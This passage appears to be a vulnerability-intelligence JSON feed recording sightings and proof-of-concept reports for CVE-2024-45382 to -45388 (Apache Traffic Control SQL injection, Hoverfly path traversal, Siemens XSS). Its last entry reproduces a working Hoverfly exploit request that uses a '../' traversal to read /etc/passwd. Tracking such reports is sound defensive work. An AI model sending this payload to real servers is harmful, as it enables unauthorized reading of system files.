"https://t.me/CyberDilara/1490", "content": "(CVE-2024-45387)\n \nhttps://github.com/aufzayed/exploit-dev/blob/main/CVE-2024-45387-PoC.py", "creation_timestamp": "2025-01-29T08:44:36.000000Z"}, {"uuid": "cff66dc8-95ed-4f24-84e7-d6b8a09cf2c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45387", "type": "published-proof-of-concept", "source": "https://t.me/CyberBulletin/26964", "content": "\u26a1\ufe0fCVE-2024-45387: PoC Published for Critical SQL Injection in Apache Traffic Control.\n\n#CyberBulletin", "creation_timestamp": "2024-12-30T13:08:26.000000Z"}, {"uuid": "98e8168a-4bdb-4ce0-9c85-566ef7653ca7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45383", "type": "published-proof-of-concept", "source": "https://t.me/reverse_dungeon/3780", "content": "Deciphering Ransomware in Virtual Machines\n\nUEFI Reverse Engineering, Vulnerability Discovery, and Exploit Development: Part 0\n\nMalware Analysis - ConfuserEx 2 Deobfuscation with Python and dnlib, BBTok Loader\n\nIdentifying Human-operated Ransomware through Windows Event Logs\n\nAPT-C-00 (OceanLotus) Dual Loader and Homologous VMP Loader\n\npoc for CVE-2024-45383\n\nCollection of Docker honeypot logs from 2021 - 2024", "creation_timestamp": "2024-10-01T06:47:09.000000Z"}, {"uuid": "f5f429bf-4455-4299-a766-32b4e580a5ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45383", "type": "published-proof-of-concept", "source": "https://t.me/S_E_Reborn/5142", "content": "Deciphering Ransomware in Virtual Machines\n\nUEFI Reverse Engineering, Vulnerability Discovery, and Exploit Development: Part 0\n\nMalware Analysis - ConfuserEx 2 Deobfuscation with Python and dnlib, BBTok Loader\n\nIdentifying Human-operated Ransomware through Windows Event Logs\n\nAPT-C-00 (OceanLotus) Dual Loader and Homologous VMP Loader\n\npoc for CVE-2024-45383\n\nCollection of Docker honeypot logs from 2021 - 2024", "creation_timestamp": "2024-10-01T22:02:28.000000Z"}, {"uuid": "c9f6a06c-c4fd-4763-836e-7fcefd6bb3d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45388", "type": "published-proof-of-concept", "source": "Telegram/ZCFA5w0CrpK-MUc1nguPz2-JCm9kksdMyB2cadpxoNX3yLmo", "content": "", "creation_timestamp": "2024-09-09T11:41:05.000000Z"}, {"uuid": "7ebce944-71a6-4519-a5c8-ee2306abcaec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45386", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113984822972033862", "content": "", "creation_timestamp": "2025-02-11T10:39:30.683285Z"}, {"uuid": "c46dc4fb-43a1-4774-88b1-10d42c05f175", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45386", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lhvjsw7ega2z", "content": "", "creation_timestamp": "2025-02-11T11:15:38.283585Z"}, {"uuid": "6a2b7b6b-560a-40a1-b8d9-a9ec80380109", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45386", "type": "seen", "source": "https://mastodon.social/users/CyberSignaler/statuses/113985329522783378", "content": "", "creation_timestamp": "2025-02-11T12:48:20.256848Z"}, {"uuid": "9db9753b-62bd-45af-937b-de2c27c596bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45386", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lhvpnigaes2i", "content": "", "creation_timestamp": "2025-02-11T12:59:58.590321Z"}, {"uuid": "0d7d6969-0faa-4edc-a897-8db5af6534aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45386", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-044-13", "content": "", "creation_timestamp": "2025-02-13T11:00:00.000000Z"}, {"uuid": "8fc924c0-440d-43b9-a469-d07d039d0b4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45388", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-14)", "content": "", "creation_timestamp": "2026-02-14T00:00:00.000000Z"}, {"uuid": "0d948fa2-a688-415a-a0ba-ab1b7cdb97af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45385", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1476", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-45385\n\ud83d\udd39 Description: A vulnerability has been identified in Industrial Edge Management OS (IEM-OS) (All versions). Affected components are vulnerable to reflected cross-site scripting (XSS) attacks. This could allow an attacker to extract sensitive information by tricking users into accessing a malicious link.\n\ud83d\udccf Published: 2025-01-14T10:30:02.825Z\n\ud83d\udccf Modified: 2025-01-14T10:30:02.825Z\n\ud83d\udd17 References:\n1. https://cert-portal.siemens.com/productcert/html/ssa-416411.html", "creation_timestamp": "2025-01-14T11:08:27.000000Z"}, {"uuid": "248084df-ec0b-41ed-87db-6f9ea62a3f61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45387", "type": "seen", "source": "https://t.me/CyberBulletin/1837", "content": "\u26a1\ufe0fApache Traffic Control users\u2014an SQL injection flaw (CVE-2024-45387) has been found, enabling attackers to execute commands directly in your database.\n\n#CyberBulletin", "creation_timestamp": "2024-12-27T12:27:47.000000Z"}, {"uuid": "8307ac8d-38dc-42c8-897e-022f47681811", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45385", "type": "seen", "source": "https://t.me/cvedetector/15248", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45385 - Industrial Edge Management OS (IEM-OS) Cross-Site Scripting (XSS) Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45385 \nPublished : Jan. 14, 2025, 11:15 a.m. | 39\u00a0minutes ago \nDescription : A vulnerability has been identified in Industrial Edge Management OS (IEM-OS) (All versions). Affected components are vulnerable to reflected cross-site scripting (XSS) attacks. This could allow an attacker to extract sensitive information by tricking users into accessing a malicious link. \nSeverity: 4.7 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"14 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-14T13:09:12.000000Z"}, {"uuid": "14a03dc5-f131-46f3-9e0c-aacb98735b84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45387", "type": "seen", "source": "https://t.me/cvedetector/13540", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45387 - Apache Traffic Control Traffic Ops SQL Injection\", \n  \"Content\": \"CVE ID : CVE-2024-45387 \nPublished : Dec. 23, 2024, 4:15 p.m. | 43\u00a0minutes ago \nDescription : An SQL injection vulnerability in Traffic Ops in Apache Traffic Control &lt;== 8.0.0 allows a privileged user with role \"admin\", \"federation\", \"operations\", \"portal\", or \"steering\" to execute arbitrary SQL against the database by sending a specially-crafted PUT request.  \n  \nUsers are recommended to upgrade to version Apache Traffic Control 8.0.2 if you run an affected version of Traffic Ops. \nSeverity: 9.9 | CRITICAL \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"23 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-23T18:20:06.000000Z"}, {"uuid": "a5b2864f-a87e-45b2-bd18-e5186c19cefa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45382", "type": "seen", "source": "https://t.me/cvedetector/7307", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45382 - Apache OpenHarmony Buffer Overflow DoS\", \n  \"Content\": \"CVE ID : CVE-2024-45382 \nPublished : Oct. 8, 2024, 4:15 a.m. | 37\u00a0minutes ago \nDescription : in OpenHarmony v4.1.0 and prior versions allow a local attacker cause DOS through out-of-bounds write. \nSeverity: 3.3 | LOW \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"08 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-08T07:01:05.000000Z"}, {"uuid": "eaf2d743-ec5a-4108-bcdb-47c03cb766ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45384", "type": "seen", "source": "https://t.me/cvedetector/5837", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45384 - Apache Druid druid-pac4j Padding Oracle Exploit via Malformed Pac4j Session Cookie\", \n  \"Content\": \"CVE ID : CVE-2024-45384 \nPublished : Sept. 17, 2024, 7:15 p.m. | 38\u00a0minutes ago \nDescription : Padding Oracle vulnerability in Apache Druid extension, druid-pac4j.  \nThis could allow an attacker to manipulate a pac4j session cookie.  \n  \nThis issue affects Apache Druid versions 0.18.0 through 30.0.0.  \nSince the druid-pac4j extension is optional and disabled by default, Druid installations not using the druid-pac4j extension are not affected by this vulnerability.  \n  \nWhile we are not aware of a way to meaningfully exploit this flaw, we   \nnevertheless recommend upgrading to version 30.0.1 or higher which fixes the issue  \nand ensuring you have a strong   \ndruid.auth.pac4j.cookiePassphrase as a precaution. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"17 Sep 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-09-17T22:18:13.000000Z"}, {"uuid": "0edb20ca-eb5a-43c5-8787-4a6718009f6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45383", "type": "seen", "source": "https://t.me/cvedetector/5509", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45383 - Microsoft High Definition Audio Bus Driver IRP Request Denial-of-Service\", \n  \"Content\": \"CVE ID : CVE-2024-45383 \nPublished : Sept. 12, 2024, 7:15 p.m. | 35\u00a0minutes ago \nDescription : A mishandling of IRP requests vulnerability exists in the HDAudBus_DMA interface of Microsoft High Definition Audio Bus Driver 10.0.19041.3636 (WinBuild.160101.0800). A specially crafted application can issue multiple IRP Complete requests which leads to a local denial-of-service. An attacker can execute malicious script/application to trigger this vulnerability. \nSeverity: 5.0 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"12 Sep 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-09-12T21:53:28.000000Z"}, {"uuid": "f867810a-e4e8-4c2a-8277-61e9c797ab0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45388", "type": "seen", "source": "https://t.me/cvedetector/4642", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45388 - Hoverfly File Path Traversal\", \n  \"Content\": \"CVE ID : CVE-2024-45388 \nPublished : Sept. 2, 2024, 6:15 p.m. | 42\u00a0minutes ago \nDescription : Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The `/api/v2/simulation` POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server. Note that, although the code prevents absolute paths from being specified, an attacker can escape out of the `hf.Cfg.ResponsesBodyFilesPath` base path by using `../` segments and reach any arbitrary files. This issue was found using the Uncontrolled data used in path expression CodeQL query for python. Users are advised to make sure the final path (`filepath.Join(hf.Cfg.ResponsesBodyFilesPath, filePath)`) is contained within the expected base path (`filepath.Join(hf.Cfg.ResponsesBodyFilesPath, \"/\")`). This issue is also tracked as GHSL-2023-274. \nSeverity: 7.5 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"02 Sep 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-09-02T21:24:11.000000Z"}, {"uuid": "ce106225-498e-4d48-b29d-4584833e9bf0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45387", "type": "seen", "source": "Telegram/Es2J4YnrYXugp7rWsUhcNBtY7ROdIywGCTvtozcnZWy5jg", "content": "", "creation_timestamp": "2024-12-25T18:48:12.000000Z"}, {"uuid": "7e4360b4-fd9b-47a4-89b9-c867986eb067", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45387", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2463", "content": "CVE-2024-45387\n*\nApache Traffic Control SQL Injection\nPoC Exploit", "creation_timestamp": "2024-12-31T15:55:25.000000Z"}, {"uuid": "eebc3079-84d1-493e-9186-209859091176", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45387", "type": "seen", "source": "https://t.me/true_secator/6586", "content": "\u0412\u0441\u043b\u0435\u0434 \u0437\u0430 CVE-2024-43441 \u0432 HugeGraph-Server \u0438 CVE-2024-56337 \u0432 Tomcat \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 Apache Software Foundation (ASF) \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0434\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 SQL-\u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0438 \u0432 Traffic Control \u0441 \u0440\u0435\u0439\u0442\u0438\u043d\u0433\u043e\u043c 9,9 CVSS.\n\n\u041f\u0440\u0438 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 CVE-2024-45387 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0441 \u0440\u043e\u043b\u044c\u044e admin, federation, operations, portal \u0438\u043b\u0438 steering \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 SQL \u0432 \u0431\u0430\u0437\u0435 \u0434\u0430\u043d\u043d\u044b\u0445 \u043f\u0443\u0442\u0435\u043c \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0433\u043e PUT-\u0437\u0430\u043f\u0440\u043e\u0441\u0430\n\n\u0420\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u043f\u0440\u0438\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044e Tencent YunDing Security Lab \u042e\u0430\u043d\u044c \u041b\u043e. \u041e\u043d\u0430 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0435\u0440\u0441\u0438\u0438 Apache Traffic Control \u043e\u0442 8.0.0 \u0434\u043e 8.0.1.\n\n\u041e\u0448\u0438\u0431\u043a\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 \u0432\u0435\u0440\u0441\u0438\u0438 Apache Traffic Control 8.0.2. \u0414\u043b\u044f \u0437\u0430\u0449\u0438\u0442\u044b \u043e\u0442 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0443\u0433\u0440\u043e\u0437 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u044b \u0434\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 \u041f\u041e.", "creation_timestamp": "2024-12-26T12:00:09.000000Z"}, {"uuid": "d2003345-d824-4b97-b408-f9f279dfc10a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45388", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3141", "content": "CVE-2024-45388\n\nPUT /api/v2/simulation HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\n \n{\"data\":{\"pairs\":[{\"request\":{},\"response\":{\"bodyFile\": \"../../../../../../../etc/passwd\",\"x\":\"aaa\"}} ]},\"meta\":{\"schemaVersion\":\"v5.3\"}}\n\n../../../../../../../etc/passwd\n\n#exploit #poc", "creation_timestamp": "2024-09-09T13:48:19.000000Z"}]}